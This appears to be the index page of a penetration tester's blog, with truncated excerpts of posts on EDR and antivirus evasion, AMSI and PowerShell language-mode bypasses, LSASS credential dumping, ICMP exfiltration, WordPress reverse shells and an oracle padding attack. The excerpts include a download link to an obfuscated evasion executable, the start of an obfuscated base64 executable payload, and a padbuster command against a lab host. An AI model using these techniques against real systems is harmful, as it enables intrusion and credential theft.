A Pentesters Ramblings

Evasion Tools

A list of tools to bypass EDR using a variety of evasion techniques. PwnPowerShell GH - Signed - https://github.com/sp00ks-git/obfuscated-Encrypted-2023/raw/gh-pages/pjutvtn.exe.Signed.exe M...

Wordlists

WORDLISTS Suggested Wordlists download links (HTTP) - working as of 14/10/2019 (maybe out of date now but some should still be working) rockyou - https://github.com/brannondorsey/naive-hashcat...

Encrypted SPN Scanning

Encrypted SPN Scanning and Cipher extraction whilst evading AntiVirus Usually SPN scanning involves using tools such as Rubeus. However as these are common and AV is looking for fingerprints of th...

AMSI

A M S I ${01001011100110010} = [Convert]::FromBase64String("TV"+"qQAAM"+"AAAAEAAAA//8A"+"ALgAAAAAAAAAQAA"+"AAAAAAAAAAAAAAAAAA"+"AAAAAAAAAAAAAAAAAA"+"AAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncm...

Win7 LPE

It is less common than it used to be to find Windows 7 operating systems in place, but they are still found across domains. Sometimes for bespoke applications or services that can’t be ported onto ...

CLM Bypass

It is common during engagements to find that CLM (Constrained Language Mode) is configured on PowerShell as a safeguard or control against malicious activity. This is a common misconception as there...

ICMP Tunneling

I recently had a situation during an engagement where I needed to demonstrate that data could be extracted from the organisation. I wanted to exfil data without going over the internet for security...

LSASS Encrypted Dump

There are many, many ways to dump the LSASS process in order to gather credentials and other sensitive information from systems. Two ways I dump LSASS can be seen below. The first way is to invok...

Reverse Shell in Wordpress with WPForce

Reverse Shell in Wordpress with WPForce and Yertle Imagine the scenario where you are presented with a WordPress site during a pentest and want to get in. Standard ‘author?’ requests don’t give y...

Oracle Padding

STEP 1 padbuster http://docker.hackthebox.eu:37742 zjtTgJyHOn9YxWLIJu%2BnoDGlL9vvl4RGVm44osvhYXxAkHGGKroFCA%3D%3D --cookies "PHPSESSID=7d5guetet0tj3o1kn8lrd77da0;iknowmag1k=zjtTgJyHOn9YxWLIJu%2BnoD...